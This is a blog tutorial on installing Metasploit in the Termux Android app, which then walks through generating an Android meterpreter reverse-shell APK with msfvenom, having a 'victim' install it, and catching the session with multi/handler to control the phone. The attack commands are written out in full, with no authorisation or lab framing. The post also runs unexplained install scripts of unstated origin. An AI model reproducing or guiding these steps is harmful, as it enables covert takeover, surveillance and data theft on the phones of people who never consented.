Headlines
Loading...


 How to install Metasploit in Termux -2021

Hey🙋‍♂️, This Post is the most Advanced post for termux and if you can learn it, you can do almost all sorts of things a beginner hacker should know. This is an advanced post on Metasploit. This tool is one of the most awesome things that you can use in termux so read it well 🔥.

What is Metasploit?

The Metasploit framework is a very powerful tool that can be used by cybercriminals as well as ethical hackers to probe systematic vulnerabilities on networks and servers. Because it’s an open-source framework, it can be easily customized and used with most operating systems.


how to install Metasploit int termux without root & what are the requirements


  • Your android version is more than 5.0
  • Termux app download termux from playstore. | Download Termux |
  • free space up to 2 GB more


Step 1:

Open the termux app and type or paste the below command to update and upgrade all the packages in the termux app.

 pkg update && pkg upgrade 

or

apt update and upgrade -y

This command will update the termux so in the installation we don't get any error.


Step 2 – Installing wget and downloading the Script

First, make sure you are in the home directory by typing:


cd $HOME

Followed by:


pkg install wget php curl git python python2 -y


step 3 - install Bundler 

pkg install bundler:1.17.3


step 4 - install openssh

pkg install openssh


step 5 - install postgresql

pkg install postgresql

step 6 - install TemuxBlack

chmod +x install.sh
./install.sh -i

step 7 install  metasploit sudo gituser data

chmod +x metasploit.sh
./metasploit.sh



step 7 - metasploit hack device

first type msfconsole to check  metasploit is installed on your system or not


step 8 - Generate payloads

"msfvenom -p android/meterpreter/reverse_tcp LHOST=(Enter your ipadress) LPORT=(Enter any 4 number) R >/data/data/com.termux/files/home/storage/shared/Android.apk"


Step 9:

Go to your internal storage and you will see Android.apk.(Generate from metasploit)

Install this apk on the victim's phone.


Start Listener (msfconsole): 

Step 1:msfconsole


Type this command in the termux session to start the msfconsole.

 msfconsole

It can take up to 30 sec or it depends on your system to start.


Step 2:-Use multi handler


Type this command to start the Multi handler in Metasploit.

 use exploit/multi/handler


Step 3:

Type this Metasploit command to set the payload.

 set payload android/meterpreter/reverse_tcp 


Step 4:

Now set the LHOST at which you wanna listen to the session.

If you are using ngrok port forwarding then enter this IP address but if you are not using port forwarding then enter your Local IP.

 "set LHOST 127.0.0.1"

Step 5:

Now set the LPORT.

if you are using Ngrok then set the same port which you used while port forwarding.

if you are not using port forwarding then just enter the same port you used to create the payload.

 set LPORT (Enter custom 4 number)


Step 6:

This is the last command and the phone will be Hacked.

 exploit.

It will connect to the victim and give you a meterpreter session.

now you can use the victim phone with your own control


CONCLUSION:

This is an advanced post on Metasploit. if you are using Ngrok then set the same port which you used while port forwarding.  This is the command that helps you to hack any victim phone that will be Hacked just in one click. It will connect to the victim and give you a meterpreter session. now you can use the victim phone with your own control and note this important if the victim deletes this payload from his/her phone then you can't control victim phone.

0 Comments: